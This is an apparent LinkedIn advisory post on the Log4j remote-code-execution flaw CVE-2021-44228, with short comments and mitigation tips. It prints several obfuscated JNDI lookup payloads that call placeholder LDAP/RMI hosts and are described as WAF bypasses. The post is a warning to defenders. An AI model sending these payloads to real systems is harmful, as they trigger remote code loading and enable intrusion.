Critical vulnerability in Apache Log4j library

Critical vulnerability in Apache Log4j library

Recently, A new zero-day exploit has been reported against the popular Log4J2 library which can allow an attacker to remotely execute code. The vulnerability has been reported with CVE-2021-44228. Many large software companies and online services use the Log4j library, including Amazon, Cisco, Apple iCloud, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and many more.


Attackers are using the below codes to bypass the Web Application Firewall :-

${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}


${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}


${jndi:Idap://127.0.0.1:1389/badClassName}


${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

and many others...


Be aware that the following ports can be used by log4j exploit:

LDAP(S), RMI, DNS, NIS, IIOP, CORBAL, NDS, HTTP



How to protect your organization ?

You shall set a IPS rules, firewall rules, WAF rules and web filtering can all help, by blocking malicious CVE-2021-44228 data from outside, and by preventing servers from connecting to known-bad sites or unwanted.



Patch your own systems right now !!!

__________________________________________________________

#cybersecurity #CVE #CTI #DFIR #webapplicationsecurity #databases #Ismail_Ahmed

Jose Pomes

Experienced and multilingual senior manager with strong team management and extensive partner/client relationship experience worldwide.

3 年
德韦

网络安全研究员

3 年

List of applications that use Log4j ... https://www.rumble.run/blog/finding-log4j/

  • 该图片无替代文字
德韦

网络安全研究员

3 年

Hackers start pushing malware in worldwide Log4Shell attacks https://www.bleepingcomputer.com/.../hackers-start.../

  • 该图片无替代文字
德韦

网络安全研究员

3 年

Thanks to all to consider about security investment in 2022 budget to mitigate risk and preventing significant financial losses.

要查看或添加评论,请登录

德韦的更多文章

  • Banner Grabbing with IsmailScript tool

    Banner Grabbing with IsmailScript tool

    In both the offensive and defensive penetration testing environment, Grabbing a banner is the first and apparently the…

    5 条评论
  • Centralized Log Management

    Centralized Log Management

    What is Centralized Log Management? In case of a cyber security incident, logs play a vital role in various activities…

  • Python programming for cybersecurity

    Python programming for cybersecurity

    Overview AS we know Python is a powerful programming language because it’s very easy. It’s a benefit for beginners, but…

    6 条评论

社区洞察

其他会员也浏览了